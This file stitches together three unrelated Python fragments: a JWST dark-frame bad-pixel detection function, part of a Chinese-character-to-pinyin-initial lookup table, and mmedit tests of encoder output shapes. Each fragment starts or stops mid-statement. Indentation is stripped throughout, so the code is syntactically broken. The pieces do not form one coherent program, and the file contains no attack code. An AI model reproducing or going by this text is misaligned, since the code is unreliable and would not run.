def find_bad_pix(filenames, uncal_filenames=None, jump_filenames=None, fitopt_filenames=None,
clipping_sigma=5., max_clipping_iters=5, noisy_threshold=5,
max_saturated_fraction=0.5,
max_jump_limit=10, jump_ratio_threshold=5, early_cutoff_fraction=0.25,
pedestal_sigma_threshold=5, rc_fraction_threshold=0.8, low_pedestal_fraction=0.8,
high_cr_fraction=0.8,
flag_values={'hot': ['HOT'], 'rc': ['RC'], 'low_pedestal': ['OTHER_BAD_PIXEL'], 'high_cr': ["TELEGRAPH"]},
do_not_use=['hot', 'rc', 'low_pedestal', 'high_cr'], outfile=None, plot=False):
"""MAIN FUNCTION
Parameters
----------
filenames : list
List of dark current slope files. These should be slope images.
uncal_filenames : list
List of uncal files. Should have a 1-to-1 correspondence to the
files in ``filenames``. If None, the scipt will look in the same
directory containing ``filenames``, and assume that the only
difference in filename is that rate.fits is replaced with
uncal.fits. Uncal files are only used when working with MIRI
data.
jump_filenames : list
List of exposures output from the jump step of the pipeline.
Should have a 1-to-1 correspondence to the
files in ``filenames``. If None, the scipt will look in the same
directory containing ``filenames``, and assume that the only
difference in filename is that rate.fits is replaced with
jump.fits
fitopt_filenames : list
List of exposures from the optional output from the ramp_fitting
step of the pipeline. Should have a 1-to-1 correspondence to the
files in ``filenames``. If None, the scipt will look in the same
directory containing ``filenames``, and assume that the only
difference in filename is that rate.fits is replaced with
fitopt.fits
clipping_sigma : int
Number of sigma to use when sigma-clipping the 2D array of
standard deviation values from the dark current slope files.
The sigma-clipped mean and standard deviation are used to locate
noisy pixels.
max_clipping_iters : int
Maximum number of iterations to use when sigma clipping to find
the mean and standard deviation values that are used when
locating noisy pixels.
noisy_threshold : int
Number of sigma above the mean noise (associated with the slope)
to use as a threshold for identifying noisy pixels.
max_saturated_fraction : float
When identifying pixels that are fully saturated (in all groups
of an integration), this is the fraction of integrations within
which a pixel must be fully saturated before flagging it as HOT
max_jump_limit : int
The maximum number of jumps a pixel can have in an integration
before it is flagged as a ``high jump`` pixel (which may be
flagged as noisy later)
jump_ratio_threshold : int
Cutoff for the ratio of jumps early in the ramp to jumps later in
the ramp. Pixels with a ratio greater than this value (and which
also have a high total number of jumps) will be flagged as
potential (I)RC pixels.
early_cutoff_fraction : float
Fraction of the integration to use when comparing the jump rate
early in the integration to that across the entire integration.
Must be <= 0.5
pedestal_sigma_threshold : int
Used when searching for RC pixels via the pedestal image. Pixels
with pedestal values more than ``pedestal_sigma_threshold`` above
the mean are flagged as potential RC pixels
rc_fraction_threshold : float
Used when searching for RC pixels. This is the fraction of input
files within which the pixel must be identified as an RC pixel
before it will be flagged as a permanent RC pixel
low_pedestal_fraction : float
This is the fraction of input files within which a pixel must be
identified as a low pedestal pixel before it will be flagged as
a permanent low pedestal pixel
high_cr_fraction : float
This is the fraction of input files within which a pixel must be
flagged as having a high number of jumps before it will be flagged
as permanently noisy
flag_values : dict
This dictionary maps the types of bad pixels searched for to the
flag mnemonics to use when creating the bad pixel file. Keys are
the types of bad pixels searched for, and values are lists that
include mnemonics recognized by the jwst calibration pipeline
e.g. {'hot': ['HOT'], 'rc': ['RC'], 'low_pedestal': ['OTHER_BAD_PIXEL'], 'high_cr': ["TELEGRAPH"]}
do_not_use : list
List of bad pixel types to be flagged as DO_NOT_USE
e.g. ['hot', 'rc', 'low_pedestal', 'high_cr']
plot : bool
If True, produce plots of intermediate results.
outfile : str
Name of fits file to save the resulting bad pixel mask to
"""
# Currently the code stipulates that 5 good values of the slope are
# needed in each pixel in order to determine a good stdev value. So
# let's check the number of input files here and quit if there are
# fewer than 5.
if len(filenames) < 5:
print(filenames)
raise ValueError("ERROR: >5 input files are required to find bad pixels from darks.")
# Add DO_NOT_USE to all requested types of bad pixels
do_not_use = [element.lower() for element in do_not_use]
for key in flag_values:
if key.lower() in do_not_use:
flag_values[key].append('DO_NOT_USE')
# Form the outfile and outdir
if outfile is None:
outfile = 'badpixels_from_darks.fits'
outdir = os.path.dirname(outfile)
if not outdir:
outdir = '.'
# Read in the slope data. Strip off reference pixels.
# Return a 3D array of slopes and a 3D array mapping where the
# science pixels are.
print('Reading slope files...')
# instrument,slopes, refpix_additions = read_slope_files(filenames)
instrument, slopes, indexes, refpix_additions = read_slope_integrations(filenames)
shape_slope = slopes.shape
# Calculate the mean and standard deviation through the stack for
# each pixel. Assuming that we are looking for noisy pixels, we don't
# want to do any sigma clipping on the inputs here, right?
mean_slope = np.mean(slopes, axis=0)
std_slope = np.std(slopes, axis=0)
hdout = fits.PrimaryHDU(mean_slope)
hdout.writeto('average_of_slopes.fits', overwrite=True)
hdout = fits.PrimaryHDU(std_slope)
hdout.writeto('sigma_of_slopes.fits', overwrite=True)
# Use sigma-cliping when calculating the mean and standard deviation
# of the standard deviations
clipped_stdevs, cliplow, cliphigh = sigma_clip(std_slope, sigma=clipping_sigma,
maxiters=max_clipping_iters,
masked=False, return_bounds=True)
avg_of_std = np.mean(clipped_stdevs)
std_of_std = np.std(clipped_stdevs)
cut_limit = avg_of_std + std_of_std*noisy_threshold
# Identify noisy pixels as those with noise values more than
# noisy_threshold*sigma above the average noise level
# noisy = std_slope > cut_limit # not a good stat we need to remove slopes with cr hits
# Plot histogram to later compare with better std_slope only containing
# slopes with no jumps detected.
if plot:
xhigh = avg_of_std + std_of_std*noisy_threshold
plot_image(std_slope, xhigh, outdir,
"Pixel Standard devations", "pixel_std_withjumps.png")
nbins = 5000
titleplot = 'Histogram of Pixel Slope STD with cosmic ray jumps: Clipped Ave ' + \
'{:6.4f}'.format(avg_of_std) + ' Std ' + '{:6.4f}'.format(std_of_std)
plot_histogram_stats(std_slope, cut_limit, nbins,
outdir, titleplot,
"histo_std_withjumps.png", xaxis_log=True)
# Read in the optional outputs from the ramp-fitting step, so that
# we can look at the y-intercepts and the jump flags
saturated = np.zeros(slopes.shape)
rc_from_pedestal = np.zeros(slopes.shape)
low_pedestal = np.zeros(slopes.shape)
high_cr_rate = np.zeros(slopes.shape)
rc_from_flags = np.zeros(slopes.shape)
slope_stack = []
islope_stack = []
total_ints = 0
counter = 0
for i, filename in enumerate(filenames):
# Read in the ramp and get the data and dq arrays
jump_file = None
if jump_filenames is not None:
jump_file = jump_filenames[i]
else:
for suffix in RATE_FILE_SUFFIXES:
if suffix in | |
[u'z'] ,
u'锚' : [u'm'] ,
u'斥' : [u'c'] ,
u'丨' : [u'g'] ,
u'贪' : [u't'] ,
u'礲' : [u'l'] ,
u'嶵' : [u'z'] ,
u'肷' : [u'q', u'x'] ,
u'兂' : [u'z'] ,
u'㗅' : [u'h'] ,
u'鑄' : [u'z'] ,
u'擏' : [u'q', u'j'] ,
u'䥒' : [u'c', u'j'] ,
u'豔' : [u'y'] ,
u'硜' : [u'k'] ,
u'峟' : [u'y'] ,
u'菡' : [u'h'] ,
u'偬' : [u'z'] ,
u'㓯' : [u'l'] ,
u'靮' : [u'd'] ,
u'柹' : [u's'] ,
u'䡼' : [u'l'] ,
u'轾' : [u'z'] ,
u'箆' : [u'b'] ,
u'䄍' : [u'z', u'd'] ,
u'萏' : [u'd'] ,
u'瀗' : [u'x'] ,
u'厖' : [u'p', u'm'] ,
u'隘' : [u'a', u'e'] ,
u'栧' : [u'y'] ,
u'躨' : [u'k'] ,
u'窰' : [u'y'] ,
u'䀷' : [u'j'] ,
u'蜹' : [u'r'] ,
u'獁' : [u'm'] ,
u'勀' : [u'k'] ,
u'釂' : [u'j'] ,
u'㡇' : [u'j', u'z'] ,
u'歑' : [u'h'] ,
u'䫐' : [u'l'] ,
u'角' : [u'j', u'l', u'g'] ,
u'痚' : [u'x'] ,
u'䍡' : [u'l'] ,
u'虣' : [u'b'] ,
u'牫' : [u'g'] ,
u'淪' : [u'l', u'g'] ,
u'郬' : [u'q'] ,
u'㭱' : [u'h', u'x'] ,
u'䗺' : [u'y'] ,
u'裼' : [u'x', u't'] ,
u'銁' : [u'j'] ,
u'甄' : [u'z', u'j'] ,
u'妇' : [u'f'] ,
u'誑' : [u'k'] ,
u'洔' : [u'z'] ,
u'皙' : [u'x'] ,
u'鸞' : [u'l'] ,
u'溩' : [u'w'] ,
u'㴴' : [u'c'] ,
u'戶' : [u'h'] ,
u'䚹' : [u'p'] ,
u'鍀' : [u'd'] ,
u'婆' : [u'p'] ,
u'㻉' : [u'b'] ,
u'揋' : [u'w'] ,
u'譐' : [u'z'] ,
u'睘' : [u'q'] ,
u'寛' : [u'k'] ,
u'蓥' : [u'y'] ,
u'潨' : [u'z'] ,
u'热' : [u'r'] ,
u'顲' : [u'l'] ,
u'䝸' : [u'j'] ,
u'棽' : [u'c', u's'] ,
u'刁' : [u'd'] ,
u'㾈' : [u'f'] ,
u'茋' : [u'd'] ,
u'粊' : [u'b'] ,
u'䨑' : [u't'] ,
u'咚' : [u'd'] ,
u'朣' : [u't'] ,
u'薤' : [u'x'] ,
u'䲪' : [u'x'] ,
u'逭' : [u'h'] ,
u'熬' : [u'a'] ,
u'弳' : [u'j'] ,
u'蠽' : [u'j'] ,
u'榼' : [u'k'] ,
u'㝃' : [u'm', u'w', u'f'] ,
u'瑅' : [u't'] ,
u'髆' : [u'b'] ,
u'䇌' : [u'q'] ,
u'汕' : [u's'] ,
u'㧜' : [u'l'] ,
u'鵟' : [u'k'] ,
u'绞' : [u'j'] ,
u'䑥' : [u's', u'e'] ,
u'囮' : [u'y', u'e'] ,
u'㱵' : [u'b', u'f'] ,
u'慷' : [u'k'] ,
u'蟸' : [u'l'] ,
u'仾' : [u'd'] ,
u'琀' : [u'h'] ,
u'傃' : [u's'] ,
u'鎅' : [u'j'] ,
u'㴆' : [u'x', u'j'] ,
u'氐' : [u'z', u'd'] ,
u'䢓' : [u'y'] ,
u'讕' : [u'l'] ,
u'羝' : [u'd'] ,
u'䐠' : [u'h'] ,
u'蜢' : [u'm'] ,
u'垭' : [u'y', u'w'] ,
u'㰰' : [u'q'] ,
u'挺' : [u't'] ,
u'侽' : [u'n'] ,
u'調' : [u'z', u'd', u't'] ,
u'织' : [u'z'] ,
u'孊' : [u'm'] ,
u'虌' : [u'b'] ,
u'囗' : [u'w'] ,
u'釙' : [u'p'] ,
u'扤' : [u'w'] ,
u'仧' : [u'c', u'z'] ,
u'觩' : [u'q'] ,
u'緱' : [u'g'] ,
u'婴' : [u'y'] ,
u'蕶' : [u'l'] ,
u'包' : [u'b'] ,
u'鸇' : [u'z'] ,
u'憎' : [u'z'] ,
u'䬕' : [u's'] ,
u'稟' : [u'b', u'l'] ,
u'妞' : [u'n'] ,
u'蒠' : [u'x'] ,
u'刯' : [u'g'] ,
u'鴱' : [u'a'] ,
u'悸' : [u'j'] ,
u'䨿' : [u'q', u'z'] ,
u'祉' : [u'z'] ,
u'壈' : [u'l'] ,
u'鯊' : [u's'] ,
u'柢' : [u'd'] ,
u'䥩' : [u'w'] ,
u'忲' : [u't'] ,
u'髴' : [u'f'] ,
u'颉' : [u'x', u'j'] ,
u'㨊' : [u'w'] ,
u'朌' : [u'b', u'f'] ,
u'䎏' : [u'a', u'h'] ,
u'鐖' : [u'j'] ,
u'弜' : [u'q', u'j'] ,
u'㮟' : [u'p', u'r', u'j', u'n'] ,
u'撡' : [u'c'] ,
u'谦' : [u'q'] ,
u'閫' : [u'k'] ,
u'岱' : [u'd'] ,
u'趻' : [u'c'] ,
u'栾' : [u'l'] ,
u'㓁' : [u'w'] ,
u'燃' : [u'r'] ,
u'饈' : [u'x'] ,
u'䁎' : [u'c'] ,
u'槓' : [u'g'] ,
u'黝' : [u'y'] ,
u'㡞' : [u'l'] ,
u'敠' : [u'd'] ,
u'䇣' : [u'y', u'n'] ,
u'嵰' : [u'q'] ,
u'㧳' : [u'b', u'z'] ,
u'竵' : [u'h'] ,
u'艺' : [u'y'] ,
u'㖀' : [u'l'] ,
u'鄃' : [u'y', u's'] ,
u'皂' : [u'z'] ,
u'堉' : [u'y'] ,
u'褓' : [u'b'] ,
u'溒' : [u'y'] ,
u'紛' : [u'f'] ,
u'龜' : [u'q', u'j', u'g'] ,
u'䚢' : [u'c'] ,
u'唫' : [u'y'] ,
u'㺲' : [u'n'] ,
u'騵' : [u'y'] ,
u'箴' : [u'z', u'j'] ,
u'䴻' : [u'l'] ,
u'叄' : [u'c', u's'] ,
u'晍' : [u't'] ,
u'胎' : [u't'] ,
u'䯔' : [u'c', u'z'] ,
u'靗' : [u'c'] ,
u'瓖' : [u'x'] ,
u'幝' : [u'c'] ,
u'轧' : [u'y', u'z', u'g'] ,
u'泦' : [u'j'] ,
u'獯' : [u'x'] ,
u'鷰' : [u'y'] ,
u'䓶' : [u'l'] ,
u'歿' : [u'm'] ,
u'稈' : [u'g'] ,
u'䚋' : [u'y'] ,
u'薍' : [u'l', u'w'] ,
u'刘' : [u'l'] ,
u'㺛' : [u'z'] ,
u'鄚' : [u'm'] ,
u'憥' : [u'l'] ,
u'褪' : [u't'] ,
u'紲' : [u'y', u'x'] ,
u'妵' : [u't'] ,
u'蒷' : [u'y'] ,
u'啂' : [u'n'] ,
u'遄' : [u'c'] ,
u'惏' : [u'l'] ,
u'䵒' : [u'n'] ,
u'衔' : [u'x'] ,
u'籜' : [u't'] ,
u'壟' : [u'l'] ,
u'蟡' : [u'g'] ,
u'呬' : [u'x'] ,
u'鍮' : [u't'] ,
u'揹' : [u'b'] ,
u'䱼' : [u'z'] ,
u'譾' : [u'j'] ,
u'羆' : [u'p'] ,
u'耏' : [u'e', u'n'] ,
u'琗' : [u'c'] ,
u'垖' : [u'd'] ,
u'銘' : [u'm'] ,
u'㴝' : [u'l'] ,
u'氧' : [u'y'] ,
u'侦' : [u'z'] ,
u'誨' : [u'h'] ,
u'纰' : [u'p', u'b'] ,
u'茹' : [u'r'] ,
u'睁' : [u'z'] ,
u'囀' : [u'z'] ,
u'闂' : [u'x'] ,
u'㱇' : [u's'] ,
u'潑' : [u'p', u'b'] ,
u'仐' : [u's'] ,
u'跒' : [u'q'] ,
u'燚' : [u'y'] ,
u'䝡' : [u'm'] ,
u'艣' : [u'l'] ,
u'癫' : [u'd'] ,
u'槪' : [u'g'] ,
u'铬' : [u'l', u'g'] ,
u'㽱' : [u'j'] ,
u'湻' : [u'c', u'z'] ,
u'䇺' : [u'c', u'd'] ,
u'購' : [u'g'] ,
u'隁' : [u'y'] ,
u'焄' : [u'x', u'h'] ,
u'嶇' : [u'q'] ,
u'躑' : [u'z'] ,
u'椔' : [u'z'] ,
u'㖗' : [u'y'] ,
u'犙' : [u's'] ,
u'騞' : [u'h'] ,
u'䄤' : [u'l'] ,
u'檩' : [u'l'] ,
u'鮳' : [u'k'] ,
u'㤴' : [u'x'] ,
u'昶' : [u'c'] ,
u'靀' : [u'm'] ,
u'幆' : [u'y'] ,
u'柋' : [u'd'] ,
u'轐' : [u'p', u'b'] ,
u'獘' : [u'b'] ,
u'忛' : [u'f'] ,
u'胥' : [u'x'] ,
u'歨' : [u'b'] ,
u'㟫' : [u'q'] ,
u'瓭' : [u'd'] ,
u'鱲' : [u'l'] ,
u'䍸' : [u'b'] ,
u'泽' : [u'y', u's', u'z', u'd'] ,
u'嘁' : [u'q'] ,
u'㮈' : [u'n'] ,
u'蜋' : [u'l'] ,
u'碊' : [u'j'] ,
u'丑' : [u'c'] ,
u'傚' : [u'x'] ,
u'挣' : [u'z'] ,
u'䢪' : [u'q', u'n', u'c', u'b', u'j'] ,
u'鐭' : [u'y'] ,
u'疬' : [u'l'] ,
u'谽' : [u'h'] ,
u'涼' : [u'l'] ,
u'灅' : [u'l'] ,
u'黆' : [u'g'] ,
u'桕' : [u'j', u'g'] ,
u'饟' : [u'x'] ,
u'竞' : [u'j'] ,
u'䁥' : [u'n'] ,
u'勮' : [u'j'] ,
u'㡵' : [u'l'] ,
u'敷' : [u'f'] ,
u'菸' : [u'y'] ,
u'䫾' : [u'b'] ,
u'砀' : [u'd'] ,
u'龅' : [u'p'] ,
u'怐' : [u'k'] ,
u'䒓' : [u'k'] ,
u'螕' : [u'b'] ,
u'玝' : [u'w'] ,
u'䠠' : [u'c'] ,
u'宭' : [u'q'] ,
u'麯' : [u'q'] ,
u'漺' : [u'c'] ,
u'䎽' : [u'w'] ,
u'蚿' : [u'x'] ,
u'狇' : [u'm'] ,
u'坊' : [u'f'] ,
u'詌' : [u'g'] ,
u'嫗' : [u'y'] ,
u'鷙' : [u'z'] ,
u'㽚' : [u'c'] ,
u'湤' : [u's'] ,
u'䋧' : [u'q'] ,
u'藩' : [u'f'] ,
u'燱' : [u'y'] ,
u'噴' : [u'p'] ,
u'襶' : [u'd'] ,
u'弅' : [u'f'] ,
u'㺄' : [u'y'] ,
u'鈇' : [u'f'] ,
u'涎' : [u'y', u'x', u'd'] ,
u'䜕' : [u'm'] ,
u'瘟' : [u'y', u'w'] ,
u'喞' : [u'j'] ,
u'袠' : [u'z'] ,
u'帯' : [u'd'] ,
u'鄱' : [u'p'] ,
u'沸' : [u'f'] ,
u'䘿' : [u'j'] ,
u'畉' : [u'f'] ,
u'哈' : [u'h'] ,
u'韊' : [u'l'] ,
u'遛' : [u'l'] ,
u'毢' : [u's'] ,
u'䕩' : [u'l'] ,
u'瑳' : [u'c'] ,
u'史' : [u's'] ,
u'雴' : [u'l'] ,
u'钉' : [u'd'] ,
u'㘊' : [u'y'] ,
u'侏' : [u'z'] ,
u'頖' : [u'p'] ,
u'匜' : [u'y'] ,
u'㞟' : [u'd'] ,
u'梡' : [u'h', u'k'] ,
u'耦' : [u'o'] ,
u'馫' : [u'x'] ,
u'㬬' : [u'j'] ,
u'簮' : [u'z'] ,
u'傱' : [u's'] ,
u'膻' : [u's', u'd', u't'] ,
u'搾' : [u'z'] ,
u'㣁' : [u'b'] ,
u'緃' : [u'z'] ,
u'镈' : [u'b'] ,
u'䱎' : [u'g'] ,
u'旓' : [u's'] ,
u'鋝' : [u'l'] ,
u'㑞' : [u'y'] ,
u'楠' : [u'n'] ,
u'兰' : [u'l'] ,
u'㗳' : [u't'] ,
u'盵' : [u'q'] ,
u'蹺' : [u'q'] ,
u'㦀' : [u'f'] ,
u'鴃' : [u'j'] ,
u'窂' : [u'l'] ,
u'吉' : [u'j'] ,
u'蔓' : [u'm', u'w'] ,
u'抒' : [u's'] ,
u'㰙' : [u'n'] ,
u'焛' : [u'l'] ,
u'鎜' : [u'p'] ,
u'夫' : [u'f'] ,
u'阵' : [u'z'] ,
u'瞴' : [u'm'] ,
u'䄻' : [u'c', u'z', u't'] ,
u'橍' : [u'r'] ,
u'賎' : [u'j'] ,
u'䟔' : [u'f'] ,
u'魗' : [u'c'] ,
u'磖' : [u'l'] ,
u'剝' : [u'b'] ,
u'荧' : [u'y'] ,
u'惦' : [u'd'] ,
u'㩭' : [u'x', u'b', u'j'] ,
u'罯' : [u'a'] ,
u'釰' : [u'r'] ,
u'䣶' : [u'h', u't'] ,
u'板' : [u'b'] ,
u'瘈' : [u'c', u'j', u'z'] ,
u'䪋' : [u'w'] ,
u'覍' : [u'p', u'b'] ,
u'帘' : [u'l'] ,
u'鴚' : | |
from collections.abc import Iterable
import numpy as np
import pytest
import torch
from mmcv.utils.parrots_wrapper import _BatchNorm
from mmedit.models.backbones import (VGG16, DepthwiseIndexBlock,
FBAResnetDilated, HolisticIndexBlock,
IndexNetEncoder, ResGCAEncoder, ResNetEnc,
ResShortcutEnc)
from mmedit.models.backbones.encoder_decoders.encoders.resnet import (
BasicBlock, Bottleneck)
def check_norm_state(modules, train_state):
"""Check if norm layer is in correct train state."""
for mod in modules:
if isinstance(mod, _BatchNorm):
if mod.training != train_state:
return False
return True
def is_block(modules):
"""Check if is ResNet building block."""
if isinstance(modules, (BasicBlock, Bottleneck)):
return True
return False
def assert_tensor_with_shape(tensor, shape):
""""Check if the shape of the tensor is equal to the target shape."""
assert isinstance(tensor, torch.Tensor)
assert tensor.shape == shape
def assert_mid_feat_shape(mid_feat, target_shape):
assert len(mid_feat) == 5
for i in range(5):
assert_tensor_with_shape(mid_feat[i], torch.Size(target_shape[i]))
def _demo_inputs(input_shape=(2, 4, 64, 64)):
"""
Create a superset of inputs needed to run encoder.
Args:
input_shape (tuple): input batch dimensions.
Default: (1, 4, 64, 64).
"""
img = np.random.random(input_shape).astype(np.float32)
img = torch.from_numpy(img)
return img
def test_vgg16_encoder():
"""Test VGG16 encoder."""
target_shape = [(2, 64, 32, 32), (2, 128, 16, 16), (2, 256, 8, 8),
(2, 512, 4, 4), (2, 512, 2, 2)]
model = VGG16(4)
model.init_weights()
model.train()
img = _demo_inputs()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['max_idx_1'], target_shape[0])
assert_tensor_with_shape(outputs['max_idx_2'], target_shape[1])
assert_tensor_with_shape(outputs['max_idx_3'], target_shape[2])
assert_tensor_with_shape(outputs['max_idx_4'], target_shape[3])
assert_tensor_with_shape(outputs['max_idx_5'], target_shape[4])
model = VGG16(4, batch_norm=True)
model.init_weights()
model.train()
img = _demo_inputs()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['max_idx_1'], target_shape[0])
assert_tensor_with_shape(outputs['max_idx_2'], target_shape[1])
assert_tensor_with_shape(outputs['max_idx_3'], target_shape[2])
assert_tensor_with_shape(outputs['max_idx_4'], target_shape[3])
assert_tensor_with_shape(outputs['max_idx_5'], target_shape[4])
model = VGG16(4, aspp=True, dilations=[6, 12, 18])
model.init_weights()
model.train()
img = _demo_inputs()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 256, 2, 2))
assert_tensor_with_shape(outputs['max_idx_1'], target_shape[0])
assert_tensor_with_shape(outputs['max_idx_2'], target_shape[1])
assert_tensor_with_shape(outputs['max_idx_3'], target_shape[2])
assert_tensor_with_shape(outputs['max_idx_4'], target_shape[3])
assert_tensor_with_shape(outputs['max_idx_5'], target_shape[4])
assert check_norm_state(model.modules(), True)
# test forward with gpu
if torch.cuda.is_available():
model = VGG16(4)
model.init_weights()
model.train()
model.cuda()
img = _demo_inputs().cuda()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['max_idx_1'], target_shape[0])
assert_tensor_with_shape(outputs['max_idx_2'], target_shape[1])
assert_tensor_with_shape(outputs['max_idx_3'], target_shape[2])
assert_tensor_with_shape(outputs['max_idx_4'], target_shape[3])
assert_tensor_with_shape(outputs['max_idx_5'], target_shape[4])
model = VGG16(4, batch_norm=True)
model.init_weights()
model.train()
model.cuda()
img = _demo_inputs().cuda()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['max_idx_1'], target_shape[0])
assert_tensor_with_shape(outputs['max_idx_2'], target_shape[1])
assert_tensor_with_shape(outputs['max_idx_3'], target_shape[2])
assert_tensor_with_shape(outputs['max_idx_4'], target_shape[3])
assert_tensor_with_shape(outputs['max_idx_5'], target_shape[4])
model = VGG16(4, aspp=True, dilations=[6, 12, 18])
model.init_weights()
model.train()
model.cuda()
img = _demo_inputs().cuda()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 256, 2, 2))
assert_tensor_with_shape(outputs['max_idx_1'], target_shape[0])
assert_tensor_with_shape(outputs['max_idx_2'], target_shape[1])
assert_tensor_with_shape(outputs['max_idx_3'], target_shape[2])
assert_tensor_with_shape(outputs['max_idx_4'], target_shape[3])
assert_tensor_with_shape(outputs['max_idx_5'], target_shape[4])
assert check_norm_state(model.modules(), True)
def test_resnet_encoder():
"""Test resnet encoder."""
with pytest.raises(NotImplementedError):
ResNetEnc('UnknownBlock', [3, 4, 4, 2], 3)
with pytest.raises(TypeError):
model = ResNetEnc('BasicBlock', [3, 4, 4, 2], 3)
model.init_weights(list())
model = ResNetEnc('BasicBlock', [3, 4, 4, 2], 4, with_spectral_norm=True)
assert hasattr(model.conv1.conv, 'weight_orig')
model.init_weights()
model.train()
# trimap has 1 channels
img = _demo_inputs((2, 4, 64, 64))
feat = model(img)
assert_tensor_with_shape(feat, torch.Size([2, 512, 2, 2]))
# test resnet encoder with late downsample
model = ResNetEnc('BasicBlock', [3, 4, 4, 2], 6, late_downsample=True)
model.init_weights()
model.train()
# both image and trimap has 3 channels
img = _demo_inputs((2, 6, 64, 64))
feat = model(img)
assert_tensor_with_shape(feat, torch.Size([2, 512, 2, 2]))
if torch.cuda.is_available():
# repeat above code again
model = ResNetEnc(
'BasicBlock', [3, 4, 4, 2], 4, with_spectral_norm=True)
assert hasattr(model.conv1.conv, 'weight_orig')
model.init_weights()
model.train()
model.cuda()
# trimap has 1 channels
img = _demo_inputs((2, 4, 64, 64)).cuda()
feat = model(img)
assert_tensor_with_shape(feat, torch.Size([2, 512, 2, 2]))
# test resnet encoder with late downsample
model = ResNetEnc('BasicBlock', [3, 4, 4, 2], 6, late_downsample=True)
model.init_weights()
model.train()
model.cuda()
# both image and trimap has 3 channels
img = _demo_inputs((2, 6, 64, 64)).cuda()
feat = model(img)
assert_tensor_with_shape(feat, torch.Size([2, 512, 2, 2]))
def test_res_shortcut_encoder():
"""Test resnet encoder with shortcut."""
with pytest.raises(NotImplementedError):
ResShortcutEnc('UnknownBlock', [3, 4, 4, 2], 3)
target_shape = [(2, 32, 64, 64), (2, 32, 32, 32), (2, 64, 16, 16),
(2, 128, 8, 8), (2, 256, 4, 4)]
# target shape for model with late downsample
target_late_ds_shape = [(2, 32, 64, 64), (2, 64, 32, 32), (2, 64, 16, 16),
(2, 128, 8, 8), (2, 256, 4, 4)]
model = ResShortcutEnc(
'BasicBlock', [3, 4, 4, 2], 4, with_spectral_norm=True)
assert hasattr(model.conv1.conv, 'weight_orig')
model.init_weights()
model.train()
# trimap has 1 channels
img = _demo_inputs((2, 4, 64, 64))
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['feat1'], target_shape[0])
assert_tensor_with_shape(outputs['feat2'], target_shape[1])
assert_tensor_with_shape(outputs['feat3'], target_shape[2])
assert_tensor_with_shape(outputs['feat4'], target_shape[3])
assert_tensor_with_shape(outputs['feat5'], target_shape[4])
model = ResShortcutEnc('BasicBlock', [3, 4, 4, 2], 6)
model.init_weights()
model.train()
# both image and trimap has 3 channels
img = _demo_inputs((2, 6, 64, 64))
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['feat1'], target_shape[0])
assert_tensor_with_shape(outputs['feat2'], target_shape[1])
assert_tensor_with_shape(outputs['feat3'], target_shape[2])
assert_tensor_with_shape(outputs['feat4'], target_shape[3])
assert_tensor_with_shape(outputs['feat5'], target_shape[4])
# test resnet shortcut encoder with late downsample
model = ResShortcutEnc('BasicBlock', [3, 4, 4, 2], 6, late_downsample=True)
model.init_weights()
model.train()
# both image and trimap has 3 channels
img = _demo_inputs((2, 6, 64, 64))
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['feat1'], target_late_ds_shape[0])
assert_tensor_with_shape(outputs['feat2'], target_late_ds_shape[1])
assert_tensor_with_shape(outputs['feat3'], target_late_ds_shape[2])
assert_tensor_with_shape(outputs['feat4'], target_late_ds_shape[3])
assert_tensor_with_shape(outputs['feat5'], target_late_ds_shape[4])
if torch.cuda.is_available():
# repeat above code again
model = ResShortcutEnc(
'BasicBlock', [3, 4, 4, 2], 4, with_spectral_norm=True)
assert hasattr(model.conv1.conv, 'weight_orig')
model.init_weights()
model.train()
model.cuda()
# trimap has 1 channels
img = _demo_inputs((2, 4, 64, 64)).cuda()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['feat1'], target_shape[0])
assert_tensor_with_shape(outputs['feat2'], target_shape[1])
assert_tensor_with_shape(outputs['feat3'], target_shape[2])
assert_tensor_with_shape(outputs['feat4'], target_shape[3])
assert_tensor_with_shape(outputs['feat5'], target_shape[4])
model = ResShortcutEnc('BasicBlock', [3, 4, 4, 2], 6)
model.init_weights()
model.train()
model.cuda()
# both image and trimap has 3 channels
img = _demo_inputs((2, 6, 64, 64)).cuda()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['feat1'], target_shape[0])
assert_tensor_with_shape(outputs['feat2'], target_shape[1])
assert_tensor_with_shape(outputs['feat3'], target_shape[2])
assert_tensor_with_shape(outputs['feat4'], target_shape[3])
assert_tensor_with_shape(outputs['feat5'], target_shape[4])
# test resnet shortcut encoder with late downsample
model = ResShortcutEnc(
'BasicBlock', [3, 4, 4, 2], 6, late_downsample=True)
model.init_weights()
model.train()
model.cuda()
# both image and trimap has 3 channels
img = _demo_inputs((2, 6, 64, 64)).cuda()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['feat1'], target_late_ds_shape[0])
assert_tensor_with_shape(outputs['feat2'], target_late_ds_shape[1])
assert_tensor_with_shape(outputs['feat3'], target_late_ds_shape[2])
assert_tensor_with_shape(outputs['feat4'], target_late_ds_shape[3])
assert_tensor_with_shape(outputs['feat5'], target_late_ds_shape[4])
def test_res_gca_encoder():
"""Test resnet encoder with shortcut and guided contextual attention."""
with pytest.raises(NotImplementedError):
ResGCAEncoder('UnknownBlock', [3, 4, 4, 2], 3)
target_shape = [(2, 32, 64, 64), (2, 32, 32, 32), (2, 64, 16, 16),
(2, 128, 8, 8), (2, 256, 4, 4)]
# target shape for model with late downsample
target_late_ds = [(2, 32, 64, 64), (2, 64, 32, 32), (2, 64, 16, 16),
(2, 128, 8, 8), (2, 256, 4, 4)]
model = ResGCAEncoder('BasicBlock', [3, 4, 4, 2], 4)
